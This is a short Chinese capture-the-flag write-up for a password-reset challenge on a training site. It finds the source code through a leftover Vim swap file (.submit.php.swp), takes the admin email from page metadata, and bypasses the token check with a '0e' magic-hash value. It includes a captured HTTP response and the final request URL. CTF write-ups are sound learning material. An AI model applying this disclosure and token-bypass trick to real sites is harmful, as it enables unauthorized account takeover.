忘记密码
通过看成step1.PHP的源代码,发现是通过vim编写的,一般的vim编写可能会产生遗留问题,就是一个备份文件.swp,但是直接用似乎不行,然后我们通过抓包, 用burpsuit在访问http://ctf5.shiyanbar.com/10/upload/step2.php?email=youmail@mail.com&check=???????"截获包如下:
HTTP/1.1 200 OK Date: Wed, 30 Aug 2017 13:28:01 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17 X-Powered-By: PHP/5.2.17 Content-Length: 1060 Content-Type: text/html <meta http-equiv=refresh content=0.5;URL="./step1.php">check error!<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="renderer" content="webkit" /> <meta name="admin" content="admin@simplexue.com" /> <meta name="editor" content="Vim" /> <title>logic</title> <style type="text/css"> body,html{ position: relative; height: 100%; width: 100%; padding: 0; margin: 0; background-color: #272822; color: #fff; } form{ position: absolute; top: 50%; left: 50%; width: 400px; margin: -70px -200px; } form input{ display: block; margin: 10px auto; width: 100%; border: none; height: 2rem; border-radius: 5px; } </style> </head> <body> <form action="submit.php" method="GET"> <h1>æ¾åå¯ç step2</h1> email:<input name="emailAddress" type="text" value="youmail@mail.com" disable="true"/></br> token:<input name="token" type="text" /></br> <input type="submit" value="æ交"> </form> </body> </html>发送数据发现step2.php(也就是上面的reponse)中要提交给另外一个submit.php文件,综上, 试一试.submit.php.swp,OK,发现源代码.注意submit前面加点((第一次见学习啦))
很幸运,在step1.php中有管理员邮箱admin@simplexue.com
构造token0e00000000
http://ctf5.shiyanbar.com/10/upload/submit.php?emailAddress=admin@simplexue.com&token=0e00000000
